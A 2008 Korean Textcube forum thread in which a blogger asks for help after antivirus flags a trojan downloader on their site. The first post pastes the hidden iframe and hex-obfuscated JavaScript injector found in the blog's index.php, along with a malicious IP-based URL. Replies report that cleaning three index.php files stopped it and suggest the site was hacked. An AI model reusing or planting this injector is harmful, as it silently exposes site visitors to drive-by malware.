Textcube : Brand yourself!

**mayiask** · 2008-12-14 12:23:23

mayiask
방문자

주제: 악성코드? 이건 뭘까요

호스팅-cafe24
TC 1.7.6

어제부터 갑자기 백신이 제 블로그에서 악성코드를 잡아내더라구요 (커스퍼스키IS)

2008-12-14 오전 11:41:33 탐지: Trojan-Downloader.Win32.Small.ageu Adobe Acrobat 8.1 http://94.247.2.157/.lck/?h=9ac0i?892bd … 0000000170

사이트 로딩중에 gogo2me.net이라는 사이트가 스쳐지나가고 94.247.2.157도 보이네요

최상위경로에서 index.php를 뜯어보니까 제일 아랫줄에 아이프레임이 삽입돼있네요 이건 원래부터 삽입돼있던건지 아닌지도 모르겠네요

iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l4943ef0c9e224(l4943ef0c9e9f4){ return (parseInt(l4943ef0c9e9f4,16));}function l4943ef0ca093d(l4943ef0ca1107){ var l4943ef0ca1cc1='';l4943ef0ca47bb=String.fromCharCode;for(l4943ef0ca3036=0;l4943ef0ca3036<l4943ef0ca1107.length;l4943ef0ca3036+=2){ l4943ef0ca1cc1+=(l4943ef0ca47bb(c102916999516l4943ef0c9e224(l4943ef0ca1107.substr(l4943ef0ca3036,2))));}return l4943ef0ca1cc1;} var xf0='';var l4943ef0ca4f8e='3C736'+xf0+'3726'+xf0+'970743E6'+xf0+'96'+xf0+'6'+xf0+'28216'+xf0+'D796'+xf0+'96'+xf0+'1297B6'+xf0+'46'+xf0+'F6'+xf0+'3756'+xf0+'D6'+xf0+'56'+xf0+'E742E77726'+xf0+'9746'+xf0+'528756'+xf0+'E6'+xf0+'5736'+xf0+'36'+xf0+'1706'+xf0+'528202725336'+xf0+'32536'+xf0+'392536'+xf0+'36'+xf0+'2537322536'+xf0+'312536'+xf0+'6'+xf0+'42536'+xf0+'352532302536'+xf0+'6'+xf0+'52536'+xf0+'312536'+xf0+'6'+xf0+'42536'+xf0+'3525336'+xf0+'42536'+xf0+'332533312533302532302537332537322536'+xf0+'3325336'+xf0+'42532372536'+xf0+'3825373425373425373025336'+xf0+'125326'+xf0+'6'+xf0+'25326'+xf0+'6'+xf0+'2536'+xf0+'372536'+xf0+'6'+xf0+'6'+xf0+'2536'+xf0+'372536'+xf0+'6'+xf0+'6'+xf0+'2533322536'+xf0+'6'+xf0+'42536'+xf0+'3525326'+xf0+'52536'+xf0+'6'+xf0+'52536'+xf0+'3525373425326'+xf0+'6'+xf0+'25326'+xf0+'52536'+xf0+'372536'+xf0+'6'+xf0+'6'+xf0+'25326'+xf0+'6'+xf0+'2536'+xf0+'332536'+xf0+'382536'+xf0+'352536'+xf0+'332536'+xf0+'6'+xf0+'225326'+xf0+'52536'+xf0+'382537342536'+xf0+'6'+xf0+'42536'+xf0+'6'+xf0+'32532372532302537372536'+xf0+'392536'+xf0+'342537342536'+xf0+'3825336'+xf0+'42533372533312533352532302536'+xf0+'382536'+xf0+'352536'+xf0+'392536'+xf0+'372536'+xf0+'3825373425336'+xf0+'42533312533312533302532302537332537342537392536'+xf0+'6'+xf0+'32536'+xf0+'3525336'+xf0+'4253237253736'+xf0+'2536'+xf0+'392537332536'+xf0+'392536'+xf0+'322536'+xf0+'392536'+xf0+'6'+xf0+'32536'+xf0+'3925373425373925336'+xf0+'12536'+xf0+'382536'+xf0+'392536'+xf0+'342536'+xf0+'342536'+xf0+'352536'+xf0+'6'+xf0+'525323725336'+xf0+'525336'+xf0+'325326'+xf0+'6'+xf0+'2536'+xf0+'392536'+xf0+'36'+xf0+'2537322536'+xf0+'312536'+xf0+'6'+xf0+'42536'+xf0+'3525336'+xf0+'52729293B7D76'+xf0+'6'+xf0+'172206'+xf0+'D796'+xf0+'96'+xf0+'13D7472756'+xf0+'53B3C2F736'+xf0+'3726'+xf0+'970743E';document.write(l4943ef0ca093d(l4943ef0ca4f8e)); /script

어디부터 손써야할까요

ㅠㅠ

**mayiask** · 2008-12-14 12:47:33

mayiask
방문자

답글: 악성코드? 이건 뭘까요

index.php 에서 iframe을 제거해도 블로그엔 아이프래임이 뜨네요 안지워져요 -_-;;

**mayiask** · 2008-12-14 13:06:44

mayiask
방문자

답글: 악성코드? 이건 뭘까요

/
/interface
/blog

찝찝하긴하지만 세 경로의index.php를 고치니까 일단 괜찮아지긴 하네요

원인이 뭘까요 ㅠㅠ

graphittie · 2008-12-14 16:15:30

graphittie
용근
오프라인

지역 Wonderland
가입일자 2006-04-20
글: 1,799

답글: 악성코드? 이건 뭘까요

해킹 당하신 것으로 보입니다. 호스팅 측에 연락을 해보십시오...

Textcube : Brand yourself!

메인메뉴

안내

최근소식

악성코드? 이건 뭘까요

글 [ 4 ]

1 mayiask이 작성한 주제 2008-12-14 12:23:23

주제: 악성코드? 이건 뭘까요

2 mayiask이 작성한 답글 2008-12-14 12:47:33

답글: 악성코드? 이건 뭘까요

3 mayiask이 작성한 답글 2008-12-14 13:06:44

답글: 악성코드? 이건 뭘까요

4 graphittie이 작성한 답글 2008-12-14 16:15:30

답글: 악성코드? 이건 뭘까요

글 [ 4 ]